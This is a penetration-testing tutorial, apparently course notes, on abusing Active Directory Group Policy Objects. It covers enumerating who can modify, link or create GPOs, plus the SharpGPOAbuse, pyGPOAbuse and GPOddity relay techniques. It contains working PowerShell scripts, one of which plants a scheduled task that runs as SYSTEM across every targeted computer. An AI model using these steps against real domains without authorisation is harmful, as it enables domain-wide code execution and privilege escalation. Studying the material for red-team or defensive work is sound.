
GPO Abuse


There are two main attack paths related to Group Policy Objects (GPOs).

  • The first involves permissions to modify a GPO. If a user can edit a GPO, they can change its configuration and cause commands or scripts to execute on every computer (or in every user session) to which that policy applies.

  • The second involves permissions to link a GPO to an Active Directory (AD) container such as an Organizational Unit (OU), the domain, or a site. On its own, this permission is not always sufficient for abuse, because the attacker still needs a GPO whose contents they control. Combined with the ability to create or modify GPOs, however, it allows an attacker to attach a malicious policy to systems in the environment.

When enumerating GPOs from a security perspective, four main characteristics should be analyzed:

  • Non-administrative users who can modify GPOs – these represent potential targets for abuse.

  • Where those GPOs are linked – these indicate the potential impact of modifying the policy.

  • Non-administrative users who can link GPOs – these provide possible attack avenues.

  • Users who can create new GPOs – these may allow an attacker to introduce a malicious policy into the domain.

Understanding these relationships helps determine whether a compromised account can influence systems through Group Policy.

GPO Enumeration - Windows

The first step is usually to enumerate the existing GPOs in the domain. Using PowerView, we can retrieve information about domain policies.

# Enumerate the first domain GPO
Get-DomainGPO | Select-Object -First 1

# List all GPOs
Get-DomainGPO -Properties displayname

Several properties are particularly important when reviewing GPO objects.

  • displayname – The name shown for the GPO in tools such as the Group Policy Management Console (GPMC). Administrators typically identify policies by this name.

  • name – The identifier of the GPO object in AD, a GUID in braces (for example {31B2F340-016D-11D2-945F-00C04FB984F9} is the Default Domain Policy). This is the value that appears in gPLink attributes.

  • gpcfilesyspath – The UNC path of the Group Policy Template inside the SYSVOL share, of the form \\<domain>\SysVol\<domain>\Policies\{GUID}. These files hold the actual policy settings and are replicated to every domain controller; tools that modify a GPO write here.

  • objectguid – The AD object's own GUID, which is different from the GUID in name. It is used by applications that address the object programmatically.

Identifying Where GPOs are Applied

GPO links are stored in the gPLink attribute of the container the policy is linked to: the domain head, a site (under CN=Sites,CN=Configuration) or an OU. The value is a list of entries of the form [LDAP://cn={GUID},cn=policies,cn=system,DC=corp,DC=local;<options>], one per linked GPO, where the GUID is the GPO's name attribute (31B2F340-016D-11D2-945F-00C04FB984F9 is the Default Domain Policy). The number after the semicolon is a bit field of link options (bit 1 = disabled, bit 2 = enforced):

  • 0 → enabled

  • 1 → disabled

  • 2 → enforced

  • 3 → enforced but disabled

Identifying Users with GPO Modification Rights

Another important task is identifying principals that can modify GPOs. The usual filter inspects the ACL of each GPO object for ACEs granted to non-default principals (domain SIDs with a RID of 1000 or higher, i.e. created users and groups rather than built-in ones) that carry potentially dangerous rights such as GenericAll, GenericWrite, WriteProperty, WriteDacl or WriteOwner. Since the settings themselves live in SYSVOL, write access to the gpcfilesyspath folder is also worth checking.

The same PowerView queries can then be used to find where those GPOs are linked, by reading the gPLink attribute at the different levels of the AD hierarchy (OUs, the domain head and sites).

To determine which systems might be affected by a linked GPO, the computers within the targeted OUs can be listed; a domain- or site-level link applies to every computer in that scope.
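The three steps above, as an added example that is not part of the original page: it finds GPOs a non-default principal can modify, decodes gPLink on every OU, the domain head and every site to see where they are linked, and lists the computers under the linked OUs. It assumes PowerView.ps1 is imported and the current user can read the directory; corp.local is a placeholder.

```powershell
# Added example, not from the original page. Ties the three steps above together with
# PowerView: (1) GPOs a non-default principal can modify, (2) where they are linked,
# decoding gPLink options, (3) computers under the linked OUs. Assumes PowerView.ps1 is
# imported and the current user can read the directory; corp.local is a placeholder.
Import-Module .\PowerView.ps1

# Domain SIDs with RID >= 1000 are created users/groups; built-in principals (512, 519,
# 520 Group Policy Creator Owners, ...) are excluded on purpose.
$nonDefaultSid = '^S-1-5-21-\d+-\d+-\d+-[1-9]\d{3,}$'
# Rights that let the holder change the GPO object (and, through the GPC ACL, its template).
$dangerous = 'GenericAll|GenericWrite|WriteProperty|WriteDacl|WriteOwner'

# (1) Modifiable GPOs. With -ResolveGUIDs a WriteProperty ACE scoped to a single
#     attribute shows that attribute in ObjectAceType; 'All' means every attribute.
$modifiable = Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {
    $_.SecurityIdentifier -match $nonDefaultSid -and $_.ActiveDirectoryRights -match $dangerous
} | ForEach-Object {
    [PSCustomObject]@{
        GpoDN     = $_.ObjectDN
        GpoGuid   = ([regex]'\{([0-9A-Fa-f-]+)\}').Match($_.ObjectDN).Groups[1].Value.ToUpper()
        Principal = ConvertFrom-SID $_.SecurityIdentifier
        Rights    = $_.ActiveDirectoryRights
        AceType   = $_.ObjectAceType
    }
}

# (2) gPLink parser. Value format:
#     [LDAP://cn={GUID},cn=policies,cn=system,DC=corp,DC=local;<options>][...]
#     options is a bit field: bit 1 = link disabled, bit 2 = enforced,
#     so 0 enabled, 1 disabled, 2 enforced, 3 enforced but disabled.
function Get-GPLinkEntry {
    param([string]$Container, [string]$GPLink)
    foreach ($m in [regex]::Matches($GPLink, '(?i)\[LDAP://cn=\{([0-9A-F-]+)\}[^;]*;(\d+)\]')) {
        $opt = [int]$m.Groups[2].Value
        [PSCustomObject]@{
            Container = $Container
            GpoGuid   = $m.Groups[1].Value.ToUpper()
            Enabled   = -not [bool]($opt -band 1)
            Enforced  = [bool]($opt -band 2)
        }
    }
}

# Domain head, every OU and every site (site links live in the Configuration partition
# and are easy to forget).
$containers = @(
    Get-DomainObject -LDAPFilter '(objectClass=domainDNS)' -Properties distinguishedname,gplink
    Get-DomainOU -Properties distinguishedname,gplink
    Get-DomainSite -Properties distinguishedname,gplink
) | Where-Object { $_.gplink }
$links = foreach ($c in $containers) { Get-GPLinkEntry -Container $c.distinguishedname -GPLink $c.gplink }

# Join: keep only the links of GPOs we can actually modify.
$targets = $links | Where-Object { $modifiable.GpoGuid -contains $_.GpoGuid }
$modifiable | Format-Table -AutoSize
$targets    | Format-Table -AutoSize

# (3) Computers that will receive each OU-linked GPO (a domain- or site-level link hits
#     every computer in scope, so only OUs need the narrower query).
foreach ($t in $targets | Where-Object { $_.Container -like 'OU=*' -and $_.Enabled }) {
    Get-DomainComputer -SearchBase $t.Container -Properties dnshostname |
        Select-Object @{ n = 'OU'; e = { $t.Container } }, dnshostname
}
```

A disabled link (options 1 or 3) is still worth recording: the holder of link rights can flip it back on, and an enforced link (2 or 3) cannot be blocked by inheritance settings further down the tree.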

Identifying Users with GPO Creation Rights

Another important privilege is the ability to create new GPOs. It can be enumerated by analyzing the ACL of the container where GPO objects are stored (CN=Policies,CN=System,<domain>) for CreateChild rights; by default only Domain Admins and Group Policy Creator Owners hold them.

If the necessary administrative tools are available, new GPOs can be created with the GroupPolicy module included in the Remote Server Administration Tools (RSAT) or with PowerGPOAbuse.

Users with the ability to link GPOs can write the gPLink attribute of sites, the domain head or OUs. This shows up as WriteProperty on gPLink (or GenericWrite/GenericAll) in the ACL of those containers, which can be enumerated with the same Get-DomainObjectAcl approach.

A GPO can then be linked with the GroupPolicy module (New-GPLink).
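The creation and link checks described above, followed by the create-and-link step with RSAT, as an added example that is not part of the original page. It assumes PowerView.ps1 is imported and the RSAT GroupPolicy module is installed; the GPO name 'Software Inventory' and the OU=Workstations target are placeholders.

```powershell
# Added example, not from the original page. Enumerates who can create GPOs (CreateChild on
# the Policies container) and who can link them (write to gPLink on OUs, the domain head
# or sites), then creates and links a GPO with the RSAT GroupPolicy module. Assumes
# PowerView.ps1 is imported and RSAT is installed; the GPO name and OU are placeholders.
Import-Module .\PowerView.ps1
Import-Module GroupPolicy

$domainDN      = 'DC=' + ((Get-Domain).Name -replace '\.', ',DC=')   # e.g. DC=corp,DC=local
$nonDefaultSid = '^S-1-5-21-\d+-\d+-\d+-[1-9]\d{3,}$'

# (1) Creation rights: CreateChild on CN=Policies,CN=System, either unrestricted ('All')
#     or limited to the groupPolicyContainer class ('Group-Policy-Container' once
#     -ResolveGUIDs maps the schema GUID). Group Policy Creator Owners (RID 520) holds
#     this by default and is dropped by the RID check.
$policiesDN = "CN=Policies,CN=System,$domainDN"
$creators = Get-DomainObjectAcl -Identity $policiesDN -ResolveGUIDs | Where-Object {
    $_.SecurityIdentifier -match $nonDefaultSid -and
    $_.ActiveDirectoryRights -match 'CreateChild|GenericAll' -and
    $_.ObjectAceType -in 'All', 'Group-Policy-Container'
} | Select-Object ObjectDN, @{ n = 'Principal'; e = { ConvertFrom-SID $_.SecurityIdentifier } },
                  ActiveDirectoryRights, ObjectAceType

# (2) Link rights: GenericAll/GenericWrite on the container, or WriteProperty on the
#     gPLink attribute ('GP-Link' after GUID resolution) or on all attributes ('All').
$containers = @(
    Get-DomainObject -LDAPFilter '(objectClass=domainDNS)' -Properties distinguishedname
    Get-DomainOU -Properties distinguishedname
    Get-DomainSite -Properties distinguishedname
)
$linkers = foreach ($c in $containers) {
    $aclArgs = @{ Identity = $c.distinguishedname; ResolveGUIDs = $true }
    # Sites live in the Configuration partition, outside the default domain search base.
    if ($c.distinguishedname -like '*,CN=Configuration,*') {
        $aclArgs['SearchBase'] = "CN=Configuration,$domainDN"
    }
    Get-DomainObjectAcl @aclArgs | Where-Object {
        $_.SecurityIdentifier -match $nonDefaultSid -and (
            $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite' -or
            ($_.ActiveDirectoryRights -match 'WriteProperty' -and $_.ObjectAceType -in 'GP-Link', 'All')
        )
    } | Select-Object ObjectDN, @{ n = 'Principal'; e = { ConvertFrom-SID $_.SecurityIdentifier } },
                      ActiveDirectoryRights, ObjectAceType
}
$creators | Format-Table -AutoSize
$linkers  | Format-Table -AutoSize

# (3) With both rights: create a GPO and link it to an OU. -LinkEnabled Yes activates the
#     link immediately; Get-GPInheritance shows the resulting link order on the OU.
$targetOU = "OU=Workstations,$domainDN"
$gpo = New-GPO -Name 'Software Inventory'
New-GPLink -Guid $gpo.Id -Target $targetOU -LinkEnabled Yes | Out-Null
(Get-GPInheritance -Target $targetOU).GpoLinks | Select-Object DisplayName, GpoId, Enabled, Enforced, Order
```

A principal that appears only in the second list cannot create anything but can still link a GPO it already controls (one from the modification check earlier) to a new set of computers, which is the combination the introduction warns about.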

Automating GPO Enumeration

The Get-GPOEnumeration script (a wrapper around PowerView) automates the process of identifying potentially exploitable GPO permissions. When executed without parameters, it searches for:

  • GPOs that non-administrative users can modify

  • Where those GPOs are linked

Additional parameters include: -ModifyGPOs, -LinkGPOs, and -CreateGPO.

GPO Abuse - Windows

Once a user has the ability to edit a GPO, they can introduce malicious configurations that will be executed on the affected systems. A common tool for this purpose is SharpGPOAbuse (or its PowerShell loader Invoke-SharpGPOAbuse.ps1), which can add an immediate scheduled task, a startup script, a user right assignment or a local administrator. Another option is PowerView's New-GPOImmediateTask command, which writes a Group Policy Preferences immediate scheduled task into the policy; it is present in the older PowerView releases, so check that the copy you carry still has it.

Note that --AddLocalAdmin works through Restricted Groups in the GPO's GptTmpl.inf, where the Members list for the local Administrators group is authoritative: it replaces the group's membership on every computer the GPO applies to, so accounts that were local administrators but are not in the list are removed. If the modified GPO has higher precedence than another GPO that also configures Restricted Groups, its list wins and overwrites those settings as well. Check for an existing [Group Membership] section before using the option.
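An added example, not from the original page or from either tool's own code, of the edit-and-verify loop for the PowerView route described above: it plants an immediate task with New-GPOImmediateTask, confirms that both the SYSVOL template and the GPO object changed (otherwise clients will not pick the task up), and performs the Restricted Groups check recommended in the caveat. It assumes a PowerView release that still ships New-GPOImmediateTask is imported and that the current user can edit the GPO; 'Vuln GPO' and the payload are placeholders.

```powershell
# Added example, not from the original page. Plants an immediate scheduled task in a GPO
# with PowerView's New-GPOImmediateTask, then checks what changed (SYSVOL template and GPO
# object) and inspects existing Restricted Groups settings before any --AddLocalAdmin style
# edit. Assumes a PowerView release that still ships New-GPOImmediateTask is imported and
# the current user can edit the GPO; 'Vuln GPO' and the payload are placeholders.
Import-Module .\PowerView.ps1
$gpoName = 'Vuln GPO'

# Record the state before the edit so the version bump can be confirmed afterwards.
$before = Get-DomainGPO -Identity $gpoName -Properties gpcfilesyspath,versionnumber,gpcmachineextensionnames

# (1) Immediate task: written as a Group Policy Preferences item on the machine side of the
#     template, so it runs once as SYSTEM on every computer the GPO applies to at the next
#     policy refresh (or when gpupdate /force runs on a target). -Command defaults to
#     powershell, so -CommandArguments is the powershell.exe command line.
New-GPOImmediateTask -TaskName 'Maintenance' -GPODisplayName $gpoName -Force `
    -CommandArguments '-NoP -W Hidden -c "whoami /all > C:\Windows\Temp\gpo_exec.txt"'

# (2) Verify both halves of the write.
$after = Get-DomainGPO -Identity $gpoName -Properties gpcfilesyspath,versionnumber,gpcmachineextensionnames

# versionNumber packs two 16-bit counters: low word = machine settings, high word = user
# settings. Clients only re-apply a GPO whose version changed, so the machine word must move.
function Get-GpoVersion([int]$v) {
    [PSCustomObject]@{ Machine = $v -band 0xFFFF; User = ($v -shr 16) -band 0xFFFF }
}
"Machine version: $((Get-GpoVersion $before.versionnumber).Machine) -> $((Get-GpoVersion $after.versionnumber).Machine)"
# The Scheduled Tasks client-side extension GUIDs must be listed here or clients ignore the XML.
"gPCMachineExtensionNames: $($after.gpcmachineextensionnames)"

# The task itself lands in the GPT on SYSVOL, replicated to every DC.
$taskXml = Join-Path $after.gpcfilesyspath 'Machine\Preferences\ScheduledTasks\ScheduledTasks.xml'
([xml](Get-Content $taskXml)).ScheduledTasks.ImmediateTaskV2 | Select-Object name, uid

# (3) Caveat check before a Restricted Groups change (what --AddLocalAdmin does): a
#     *S-1-5-32-544__Members line in GptTmpl.inf is an authoritative member list for the
#     local Administrators group. If one already exists, this GPO is already enforcing
#     membership and a replacement list removes everyone not on it.
$tmpl = Join-Path $after.gpcfilesyspath 'Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf'
if (Test-Path $tmpl) {
    Select-String -Path $tmpl -Pattern '^\*S-1-5-32-544__Members' | ForEach-Object { $_.Line }
} else {
    'No GptTmpl.inf: this GPO carries no security settings (and no Restricted Groups) yet.'
}

# Cleanup once done: New-GPOImmediateTask -Remove -Force -GPODisplayName $gpoName
```

If the machine version did not increase or gPCMachineExtensionNames is still empty, the XML will sit in SYSVOL unread; redo the AD-side update before waiting on a policy refresh.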

GPO Enumeration - Linux

GPO enumeration can also be performed from Linux. Tools such as GPOwned and pywerview provide functionality similar to PowerView. GPOwned's gpcmachine and gpcuser flags target the computer and user sides of a GPO respectively.

Site-level links are not included by default, so they may need to be queried directly from the Sites container (CN=Sites,CN=Configuration,<domain>) in Active Directory. To identify users with GPO modification rights, GPOwned can be combined with dacledit.

GPO Abuse - Linux

To abuse a GPO from Linux, pyGPOAbuse can be used. This tool partially implements the functionality of SharpGPOAbuse and allows execution of commands on the affected systems through an immediate scheduled task, either a plain command or PowerShell.

GPOddity

GPOddity combines NTLM relaying with a modification of the GPO object itself rather than of its files in SYSVOL:

  1. A target user holds WriteDACL (or another write right) over a GPO object.

  2. The target user's NTLM authentication is relayed to LDAP and used to rewrite the GP template path (gPCFileSysPath) of that GPO so that it points to an attacker-controlled share instead of SYSVOL.

  3. Computers applying the GPO fetch the template from that share, where a malicious copy of the GPT (for instance with an added scheduled task) is served.

(Figure: the GPOddity attack, image taken from the CRTP course.)
